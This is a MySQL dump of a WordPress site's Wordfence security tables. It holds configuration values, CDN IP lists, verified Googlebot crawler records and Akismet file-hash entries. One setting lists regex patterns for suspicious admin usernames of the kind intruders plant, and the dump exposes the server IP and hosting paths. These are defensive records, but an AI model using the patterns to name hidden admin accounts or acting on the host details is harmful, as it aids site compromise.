Mè=„°æO‚¡–h³¿£™’þ=Øíln&ÎÑø¾„çÄƒæJÇÓ—µ‰£~ÄÄÞ÷…élþL;•-ºÎFÒÄ\0ÓÙU±ƒ*/·—ÖÖdã.>z_ÛþMEÈMÕ-/vÄç_Ú…c’œâ¯é?,U&üß"–‹Rþ[à˜¼Rá±ÆØá|LìõŒ•§<uQR”V³¤ ¸xþs 	b[Ðy¦iÏCàâ¨õ\0öâôãTþq@W~‡þ{™á¹œgñIU9ÿ\0ÅØÚ¡Swíq’\\(LpR^þ_mËo²<eÇç{„FE²P\n-ÀáðÞ,5Hþ¼:¤œ@¾æÆ\rà%·­-ƒ™½½à,$y·Ãkèþ¿\\ý3†ë”¢ß“{½B2—Aá™êÖGÙ<Š&%þÁùß¼w$ž¦™cŽTVÂ¶\r‰|fø7hCÁp\ZÐþÝ8šwGþ+‰dUxÑÕXcˆÑ¨Vò*¿6Øi(ÎþåHÖXwÙ6[òþ|ýJaÙÍ´çÐ–Òq^ü¥þìOžh;xAô3×÷-\r¬ðèhMœ>kv7¥Å[þòžÞ×‡d£Ì‚zR<¯¿2õêèKˆ®ÓØÃ7‰I“þýIÆ!1&™j¶‡[6›¼ˆš56i¹8ç›nžtþýl™*ÿÇñ?·ˆò½/]À\Zø4í¨¹tXê*ý¹ò5®ÿ2ó.p²Â·Ð"„Fœ6ZØ™\n¹Ý$zŒ÷z¸¤\rÿ9`\\&S9â~{-LKÅIÛT–iØï;•u!®öÿ7ôÿ±˜UÍe°H> -ôä%G µ(ŒmÎ\0˜ùÿDO;†™^ñKÔälµ¿½€Ø¸!à/?aFÓzìò#ÿU³%föî­{øxóÊiŒ<ç¹f¯œ;¯˜µ–š‰KÿZ9Þ°NúÝWj_‰Hñ¬]ÏÍšV”IùR[ëƒ›ÖBÿwðšs°ÐbN}¼qY…Çý7zo•Uæªuô''¡¥Ö1ÿk¯®’~P,oü¨ÁÊ‚-~¦BÊ¾Ëi>1¹/#ÿ´Þ#öÛyš‹XÔoaª…\\DÅžheb¤‰õÿÂàhƒæ?)—3Ž»1àuóŸ¡s˜Þ_sñ³¢Ð¨dÿÄ>V *RˆŸ/\0˜ˆòÛãÓ·ï~rÆ%"ÒÊæžòÿÅò8lbØÎºÿ§"ž7eŽEŒ=n~ÛÑÍ™''2ÕC/ÿËâú¶¸rÍ\rÇÌˆÙ\r‹;ÑJ¬UŒË‘-ó\\BÿÖ?»›	C¿Q–¾Ûc2 Gƒ‚”â“½eåÞh£ähï‘ÿÚÝŒ^Ý@óË¶\\},nÑÜ¿Û›~AëF×,ìÿâ"øÇ¢ì@¬\nŸpy4&¾7‚:˜wO–h4jùy¨DØÿý{Å<n—Ð½¯>!Äí2ú¤_UÖd~ ÞpØç²7O";}_J/ur4\0', 'no');
INSERT INTO `wpou_wfconfig` VALUES
('scanFileProcessing', '', 'yes'),
('wfsd_engine', '', 'no'),
('signatureUpdateTime', '1712499888', 'yes'),
('lastBruteForceDataSendTime', '1712321011.635300', 'yes'),
('suspiciousAdminUsernames', 'a:2:{i:0;s:46:"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i";i:1;s:55:"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i";}', 'yes'),
('adminNoticeQueue', 'a:0:{}', 'yes'),
('lastQuickScan', '1712725021.0405', 'yes'),
('lastPermissionsTemplateCheck', '1712737363', 'yes'),
('ipResolutionList', '{"cloudfront":{"name":"Amazon CloudFront","ipv4":["120.52.22.96\\/27","205.251.249.0\\/24","180.163.57.128\\/26","204.246.168.0\\/22","111.13.171.128\\/26","18.160.0.0\\/15","205.251.252.0\\/23","54.192.0.0\\/16","204.246.173.0\\/24","54.230.200.0\\/21","120.253.240.192\\/26","116.129.226.128\\/26","130.176.0.0\\/17","108.156.0.0\\/14","99.86.0.0\\/16","13.32.0.0\\/15","120.253.245.128\\/26","13.224.0.0\\/14","70.132.0.0\\/18","15.158.0.0\\/16","111.13.171.192\\/26","13.249.0.0\\/16","18.238.0.0\\/15","18.244.0.0\\/15","205.251.208.0\\/20","3.165.0.0\\/16","3.168.0.0\\/14","65.9.128.0\\/18","130.176.128.0\\/18","58.254.138.0\\/25","205.251.201.0\\/24","205.251.206.0\\/23","54.230.208.0\\/20","3.160.0.0\\/14","116.129.226.0\\/25","52.222.128.0\\/17","18.164.0.0\\/15","111.13.185.32\\/27","64.252.128.0\\/18","205.251.254.0\\/24","3.166.0.0\\/15","54.230.224.0\\/19","71.152.0.0\\/17","216.137.32.0\\/19","204.246.172.0\\/24","205.251.202.0\\/23","18.172.0.0\\/15","120.52.39.128\\/27","118.193.97.64\\/26","3.164.64.0\\/18","18.154.0.0\\/15","54.240.128.0\\/18","205.251.250.0\\/23","180.163.57.0\\/25","52.46.0.0\\/18","52.82.128.0\\/19","54.230.0.0\\/17","54.230.128.0\\/18","54.239.128.0\\/18","130.176.224.0\\/20","36.103.232.128\\/26","52.84.0.0\\/15","143.204.0.0\\/16","144.220.0.0\\/16","120.52.153.192\\/26","119.147.182.0\\/25","120.232.236.0\\/25","111.13.185.64\\/27","3.164.0.0\\/18","54.182.0.0\\/16","58.254.138.128\\/26","120.253.245.192\\/27","54.239.192.0\\/19","18.68.0.0\\/16","18.64.0.0\\/14","120.52.12.64\\/26","99.84.0.0\\/16","205.251.204.0\\/23","130.176.192.0\\/19","52.124.128.0\\/17","205.251.200.0\\/24","204.246.164.0\\/22","13.35.0.0\\/16","204.246.174.0\\/23","3.164.128.0\\/17","3.172.0.0\\/18","36.103.232.0\\/25","119.147.182.128\\/26","118.193.97.128\\/25","120.232.236.128\\/26","204.246.176.0\\/20","65.8.0.0\\/16","65.9.0.0\\/17","108.138.0.0\\/15","120.253.241.160\\/27","64.252.64.0\\/18","13.113.196.64\\/26","13.113.203.0\\/24","52.199.127.192\\/26","13.124.199.0\\/24","3.35.130.128\\/25","52.78.247.128\\/26","13.233.177.192\\/26","15.207.13.128\\/25","15.207.213.128\\/25","52.66.194.128\\/26","13.228.69.0\\/24","52.220.191.0\\/26","13.210.67.128\\/26","13.54.63.128\\/26","3.107.43.128\\/25","3.107.44.0\\/25","3.107.44.128\\/25","43.218.56.128\\/26","43.218.56.192\\/26","43.218.56.64\\/26","43.218.71.0\\/26","99.79.169.0\\/24","18.192.142.0\\/23","18.199.68.0\\/22","18.199.72.0\\/22","18.199.76.0\\/22","35.158.136.0\\/24","52.57.254.0\\/24","13.48.32.0\\/24","18.200.212.0\\/23","52.212.248.0\\/26","18.175.65.0\\/24","18.175.66.0\\/24","18.175.67.0\\/24","3.10.17.128\\/25","3.11.53.0\\/24","52.56.127.0\\/25","15.188.184.0\\/24","52.47.139.0\\/24","3.29.40.128\\/26","3.29.40.192\\/26","3.29.40.64\\/26","3.29.57.0\\/26","18.229.220.192\\/26","18.230.229.0\\/24","18.230.230.0\\/25","54.233.255.128\\/26","3.231.2.0\\/25","3.234.232.224\\/27","3.236.169.192\\/26","3.236.48.0\\/23","34.195.252.0\\/24","34.226.14.0\\/24","44.220.194.0\\/23","44.220.196.0\\/23","44.220.198.0\\/23","44.220.200.0\\/23","44.220.202.0\\/23","44.222.66.0\\/24","13.59.250.0\\/26","18.216.170.128\\/25","3.128.93.0\\/24","3.134.215.0\\/24","3.146.232.0\\/22","3.147.164.0\\/22","3.147.244.0\\/22","52.15.127.128\\/26","3.101.158.0\\/23","52.52.191.128\\/26","34.216.51.0\\/25","34.223.12.224\\/27","34.223.80.192\\/26","35.162.63.192\\/26","35.167.191.128\\/26","35.93.168.0\\/23","35.93.170.0\\/23","35.93.172.0\\/23","44.227.178.0\\/24","44.234.108.128\\/25","44.234.90.252\\/30"],"ipv6":["2600:9000:3000::\\/36","2600:9000:f600::\\/39","2600:9000:f540::\\/42","2409:8c00:2421:300::\\/56","2600:9000:f000::\\/38","2600:9000:f500::\\/43","2600:9000:ddd::\\/48","2600:9000:f800::\\/37","2600:9000:f400::\\/40","2600:9000:f538::\\/45","2600:9000:5380::\\/41","2600:9000:1000::\\/36","2600:9000:2000::\\/36","2400:7fc0:500::\\/40","2600:9000:4000::\\/36","2600:9000:fff::\\/48","2409:8c00:2421:400::\\/56","2404:c2c0:500::\\/40","2600:9000:5308::\\/45","2600:9000:f534::\\/46","2600:9000:f520::\\/44","2600:9000:5320::\\/43","2600:9000:5310::\\/44","2600:9000:f580::\\/41","2600:9000:5340::\\/42","2600:9000:eee::\\/48"],"timestamp":1712343190},"ezoic":{"name":"Ezoic","timestamp":1698348469,"ipv4":["52.20.63.25","3.225.202.138","3.217.200.190","54.212.71.227","52.12.170.68","34.218.21.81","3.7.90.144","13.127.240.219","18.139.6.69","18.140.184.0","3.106.6.164","3.106.176.6","13.237.131.67","15.222.77.144","15.222.108.52","18.157.131.187","18.157.105.182","3.126.25.160","34.248.174.237","52.16.85.139","34.255.61.232","15.236.165.82","15.236.137.228","15.236.166.30","18.228.20.129","18.228.107.195"],"ipv6":["2600:1f10:4c55:e200::\\/56","2600:1f13:393:600::\\/56","2406:da1a:e10::\\/56","2406:da18:9d0:1400::\\/56","2406:da1c:58a:e100::\\/56","2600:1f11:f39:6f00::\\/56","2a05:d014:776:a600::\\/56","2a05:d018:dd:7800::\\/56","2a05:d012:4d8:6800::\\/56","2600:1f1e:342:2f00::\\/56"]},"quic-cloud":{"name":"Quic.cloud","timestamp":1712347201,"ipv4":["102.221.36.98","102.221.36.99","103.146.63.42","103.152.118.219","103.152.118.72","103.164.203.163","103.188.22.12","103.28.90.190","103.75.117.169","104.225.142.116","104.244.77.37","108.61.158.223","109.248.43.195","135.148.120.32","136.243.106.228","139.84.159.47","141.164.38.65","146.88.239.197","147.78.0.165","147.78.3.13","147.78.3.161","149.248.44.108","149.28.47.113","149.28.85.239","152.228.171.66","155.138.221.81","156.67.218.140","157.90.154.114","158.51.123.249","162.254.117.80","162.254.118.29","163.182.174.161","163.47.21.168","164.52.202.100","167.71.185.204","167.88.61.211","170.249.218.98","172.111.38.73","178.17.171.177","178.22.124.247","178.22.124.251","178.255.220.12","18.192.146.200","185.116.60.231","185.116.60.232","185.126.237.129","185.205.187.233","185.228.26.40","185.53.57.40","185.53.57.89","188.172.228.182","188.172.229.113","188.64.184.71","190.92.176.5","191.96.101.140","192.99.38.117","193.203.191.189","194.163.134.104","194.36.144.221","195.231.17.141","198.38.89.73","199.59.247.242","200.58.127.145","201.182.97.70","202.182.123.93","202.61.226.253","204.10.163.237","207.148.121.96","209.124.84.191","209.208.26.218","211.23.143.87","213.159.1.75","213.183.48.170","213.184.85.245","216.238.106.164","216.238.71.13","216.250.96.181","23.150.248.180","27.131.75.40","27.131.75.41","31.131.4.244","31.22.115.186","34.247.229.180","37.120.131.40","38.101.149.196","38.54.30.31","38.54.42.235","38.54.79.187","38.60.253.237","41.185.29.210","41.223.52.170","43.231.0.46","45.124.65.86","45.132.244.92","45.248.77.61","45.32.123.201","45.32.169.55","45.32.210.159","45.32.67.144","45.32.77.223","45.77.148.74","45.77.233.177","45.77.57.25","46.250.220.133","49.12.102.29","5.134.119.103","5.134.119.194","5.188.183.13","5.189.146.228","51.79.221.227","51.81.186.219","51.81.33.156","54.36.103.97","61.219.247.87","61.219.247.90","64.176.4.251","64.227.16.93","65.108.104.232","65.20.75.178","65.21.81.50","65.21.81.51","66.42.116.188","69.50.95.216","70.34.205.229","79.172.239.249","81.31.156.245","81.31.156.246","83.229.71.151","86.105.14.231","86.105.14.232","89.58.38.4","91.201.67.57","91.228.7.67","92.118.205.75","93.95.227.66","94.75.232.90","95.179.133.28","95.216.116.209"],"ipv6":[]}}', 'yes'),
('howGetIPs_trusted_proxy_preset', '', 'yes'),
('ipResolutionListHash', '9d036be284262bef00502f73c52fd617b88c9d9a7e13466729f3898b51314d9d', 'yes'),
('wafAlertLastSendTime', '1700956550', 'yes'),
('serverIP', '1710867647;209.182.199.149', 'yes'),
('emailedIssuesList', 'a:4:{i:0;a:2:{s:7:"ignoreC";s:32:"9a3bb852a37b4e6debc3dd8b92f2a581";s:7:"ignoreP";s:32:"9a3bb852a37b4e6debc3dd8b92f2a581";}i:1;a:2:{s:7:"ignoreC";s:32:"af905ca1f03f93c0e33b192d8aaf9c22";s:7:"ignoreP";s:32:"af905ca1f03f93c0e33b192d8aaf9c22";}i:2;a:2:{s:7:"ignoreC";s:32:"ed0ea811232d120f777322f3f5b85d2c";s:7:"ignoreP";s:32:"ed0ea811232d120f777322f3f5b85d2c";}i:3;a:2:{s:7:"ignoreC";s:32:"a9efb286175001eedbe618abeb892f0a";s:7:"ignoreP";s:32:"a9efb286175001eedbe618abeb892f0a";}}', 'yes'),
('satisfactionPromptDismissed', '0', 'yes'),
('satisfactionPromptInstallDate', '0', 'yes'),
('satisfactionPromptOverride', '1', 'yes'),
('lastDailyCron', '1712693145', 'yes'),
('vulnerabilities_core', 'a:1:{s:7:"current";a:4:{s:10:"vulnerable";b:0;s:4:"link";b:0;s:5:"score";N;s:6:"vector";N;}}', 'yes');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfcrawlers`
--

CREATE TABLE `wpou_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfcrawlers`
--

INSERT INTO `wpou_wfcrawlers` VALUES
('\0\0\0\0\0\0\0\0\0\0ÿÿBùBÈ', '‹üÀ•>b0«oQ1Œö', 'verified', 1712139326, 'crawl-66-249-66-200.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùA¬', '‹üÀ•>b0«oQ1Œö', 'verified', 1712588027, 'crawl-66-249-65-172.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùA«', '‹üÀ•>b0«oQ1Œö', 'verified', 1712615228, 'crawl-66-249-65-171.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùAª', '‹üÀ•>b0«oQ1Œö', 'verified', 1712639497, 'crawl-66-249-65-170.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùMŠ', '‹üÀ•>b0«oQ1Œö', 'verified', 1712405361, 'crawl-66-249-77-138.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùMŒ', '‹üÀ•>b0«oQ1Œö', 'verified', 1712406477, 'crawl-66-249-77-140.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùBÅ', '‹üÀ•>b0«oQ1Œö', 'verified', 1712118305, 'crawl-66-249-66-197.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùBÇ', '‹üÀ•>b0«oQ1Œö', 'verified', 1712174293, 'crawl-66-249-66-199.googlebot.com'),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùM‹', '‹üÀ•>b0«oQ1Œö', 'verified', 1712459132, 'crawl-66-249-77-139.googlebot.com');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wffilechanges`
--

CREATE TABLE `wpou_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wffilemods`
--

CREATE TABLE `wpou_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `real_path` text NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wffilemods`
--

INSERT INTO `wpou_wffilemods` VALUES
('ˆðw”Ái.¹w¾(M;0D', 'wp-content/plugins/akismet/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦ÿDÖ-P†è4ŒXbˆ1\r', 'h?÷ÏžTûROHˆXG›6¼–éÊT`CÓ¬—', '', 0, '?'),
('ôœˆŒŽÇIÌ*Ÿ:oÍ', 'wp-content/plugins/akismet/LICENSE.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/LICENSE.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²4îMiõüäHj€ý¯JBc', '¼ÿ\0v1£êsÔNí>cIDÙ¦¾Ö„Ié­0ÿ-', '', 0, '?'),
('Î|ß˜€/	°â~ÎV_E', 'wp-content/plugins/akismet/_inc/akismet-admin.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet-admin.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'š/h #MÈÿŒŽªÛ\n', 'çÌü¸>ÙÈœùá‰B…Z¥?IÛ9 vã~Áñƒšµ', '', 0, '?'),
('\0^Ím#åK§®g© 4F', 'wp-content/plugins/akismet/_inc/akismet-admin.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet-admin.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á°ÉòhA(öKÉòln±H¬', '>#Ap«G¡®KŸ‡Ü¤»éÏÁº?Õ0”ŽiIx3¿', '', 0, '?'),
('ûM­E–çS×D,:•¬z', 'wp-content/plugins/akismet/_inc/akismet-frontend.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet-frontend.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘•KHŠ›ü­å(Öÿ\\|è?', 'ÕèÈÍ²­Ï]''µsýHi©\r;á{ú¼@M¡c•tÁF', '', 0, '?'),
('Læ¿\r¡†È¦:Õènòh''', 'wp-content/plugins/akismet/_inc/akismet.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+ž`®–s¤@lJmë', '£§´à¿VôPÂHu(€š~Anê—_Q–‰~á™µ\0þe', '', 0, '?'),
('Ì½ó þ˜ŸX™$oB¹', 'wp-content/plugins/akismet/_inc/akismet.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/akismet.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆyL*Žbu“>Þ}ò¿…', 'ß·þ“ÁŸ¬‹‘F\n ³[Ü²0”eëKáü=|&­±', '', 0, '?'),
('&ïÙ—[zr`à¸ù%ÅŒ', 'wp-content/plugins/akismet/_inc/fonts/inter.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/fonts/inter.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '&WÁD}¡a#DHJ+¿Þ', '¡ÃB›gafÆ`÷%2Ðâ)ê!;''pCg\0Ev‰', '', 0, '?'),
('càu©2¢ÐgÕ‘Å[3+', 'wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆbÈ×''ñhû2ë ¹€~s', 'µêÁm¤¦éRzÑ‚q>kK	8å—ÈØg÷¼l»ào@n', '', 0, '?'),
('2 &qÆÓá×¢Å³ÜòV', 'wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ˜½¹Fxí’¹AÛÈŠ', 'K(XxÛ¯à.	¸3,”\ZFy#^ïy\n®(¡LíV', '', 0, '?'),
('äIÐIè–bµÖ^yâ$§v', 'wp-content/plugins/akismet/_inc/img/arrow-left.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/arrow-left.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸ö«ã“^]ÄÓP9ºKGâ', '±¢Jô;×°£ìì§Ãk›Å:¾À}uò>k@“îF', '', 0, '?'),
('sßéÚGM² ÜáJ ðT', 'wp-content/plugins/akismet/_inc/img/icon-external.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/icon-external.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡l¯äÙ;ãM	¨D¦ŸÄü', '³>HíZF-éÐ$Ìv|ùr\nw÷ÞýÄ„ÌY±‡&', '', 0, '?'),
('¾¾x™«ýÖmY\r=‘ìÎP9', 'wp-content/plugins/akismet/_inc/img/logo-a-2x.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/logo-a-2x.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'wÜJZ>µÑÔÓÃ‰™', '˜Jƒzµ…{°°M¢»\rRÿæ€®lBA\r§U´ŸÂ¨', '', 0, '?'),
('''Póä™T]Ù	ÿ6ÿ~‚', 'wp-content/plugins/akismet/_inc/img/logo-full-2x.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/img/logo-full-2x.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ã®^K­ä-^øˆ>A·s{ï', 'ö%>œ:1¸W™µR¿ÚØŠÍ©°ÂQÔi‚ñ~Õ^G', '', 0, '?'),
('Ž–»-Ùh%Uf÷}¨²', 'wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥Rˆ0:Š”¶û¿Ú­üþv', 'rÐz:hr9?›ÊÚ†½ÍˆR¿wK5nüRî~Ü7ù', '', 0, '?'),
('ö€£¡‚:’$¶d‡4', 'wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š¾ÜÇ#5"´;ïÖÞÓ', 'æCC_pº `00ËëµGÞ–E40Ä´&z÷Áëã¯¾', '', 0, '?'),
(')ÌƒÕ2±kÕh¯Ÿò! ', 'wp-content/plugins/akismet/akismet.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/akismet.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÓX‘dªž[2¶4Ðâ8à', '™oÜ…¥u¨òe5Xv.åo½‘•ä9[tÂ›ªù90b', '', 0, '?'),
('¢³óU‡„)äàÊ€3G', 'wp-content/plugins/akismet/changelog.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/changelog.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØyŒÉ2®Ã}º9', 'šÝL¬Iýn­ÉÙû*(2ñb¬‚ˆnªÛÄ„Lv_Ñó©', '', 0, '?'),
('ò–ÝÕjKé&·…íÖY', 'wp-content/plugins/akismet/class.akismet-admin.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-admin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!¶w·™ýôžæ°\Zyá…Ò­', 'gâ¶µ‡ds±½™N¼ôá˜dy~¨B·L|íÎhÇ', '', 0, '?'),
('‹±fé¤§xMªP]~B—Ô', 'wp-content/plugins/akismet/class.akismet-cli.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-cli.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ÅÂ`¿p<ðÅqT±E', 'g·mRÇ=h-;?ylÛµ˜­lçf&´8áC\\Ù<Vh', '', 0, '?'),
('HêÑû!¾‹[?Êz>þòÕÛ', 'wp-content/plugins/akismet/class.akismet-rest-api.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-rest-api.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŽóÛÑ™üÊFâUTÜ', 'îEbžø]öGcC2Üg«ýož\\‚ì¤Ö6ãÞhÈ‘', '', 0, '?'),
('„ló¿g<Ðë¹É=Æl‰', 'wp-content/plugins/akismet/class.akismet-widget.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet-widget.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¯H×LBœ_\0qµlRªƒ', 'ðz¿@KWãá‚é3·Ô£ÎS}fS"åÔú¾ÚŒo''', '', 0, '?'),
('pùÀö—b¥~ƒoBkÌZ', 'wp-content/plugins/akismet/class.akismet.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/class.akismet.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'â‹ü½Ïž¾«''½Q', 'ßä¢¤ŽIÉ¬ör(§¤²`µº(eÿÄï©­jÞ²æû&²', '', 0, '?'),
('Aý°‰$hÜõÕ`Qøa', 'wp-content/plugins/akismet/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ïh•¯ PëZçÀºÝ¢`Ef', '½Â}ÜÜÕ5á›eÿ3¹Ù3ÁŽmhyDæŒQ(', '', 0, '?'),
('’o«/Êdð4x`¤œ', 'wp-content/plugins/akismet/readme.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/readme.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±Ã#ÛEÐ‘­†\n|Ø¶¸j', 'g\r³•}àês»EðÆ´Ë~Áô.0õÊË¦žð‹ŽÎ¯Å', '', 0, '?'),
('–!Û….Ý4§§qdtP‰–', 'wp-content/plugins/akismet/views/activate.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/activate.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à{ETJ›_qŸ¾·n–¼Ä', 'Î‡^\nÄb—‚q<v`x¶ä£K¤£ÁZ—WŽÏ>°GwÖÕ', '', 0, '?'),
('Óâ³>Zbµo&ÂÔ', 'wp-content/plugins/akismet/views/config.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/config.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬›÷Ûä†ÑuBÑ®*eî', 'uL!?#œ¬¥W(Ÿu@½8‡â:TÝá‹kÇkvË=', '', 0, '?'),
('ÞOKNŸ\0‰Yn"²‚a', 'wp-content/plugins/akismet/views/connect-jp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/connect-jp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†ÆÜø³òW¹­Ùä®ß€', '6-«ÄÝ…Aô\r[*èwXºyA!pïÈì;.ß¼2ÆS', '', 0, '?'),
('''¡"z®ÉnÆÚpâÁÎaE', 'wp-content/plugins/akismet/views/enter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/enter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',•Ù}¤þ|‡Ý‚æØƒm', '$w¦â~ÉÅ‘t”- ûPŸˆÏú›ðElF‰„XÉôÿ', '', 0, '?'),
('¹bœE‡‘3Óg''cZ (š÷', 'wp-content/plugins/akismet/views/get.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/get.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÆãKÚõh?õó³…tš	Y', 'š©:Œó2[ÌI¾ü³;çn´ÂUYY!âµ„>©XZ', '', 0, '?'),
('Õ–ÕFŠ†\n[=6µÿ6\n', 'wp-content/plugins/akismet/views/logo.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/logo.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'IW:Å×’|ÿ6œÓ', '¾},x0#±ùN8KSéÅlT˜Ã`–’>~^•ôbö', '', 0, '?'),
('­ÑÑWdú;C\r¾ÄÜO®', 'wp-content/plugins/akismet/views/notice.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/notice.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½9ˆÏ{Ù|ü£%*ù_¶', 'I+Ðæ©Pæ½€ð‹¯ßg8L†ÉÞ½¨ªG¥›.¬·', '', 0, '?'),
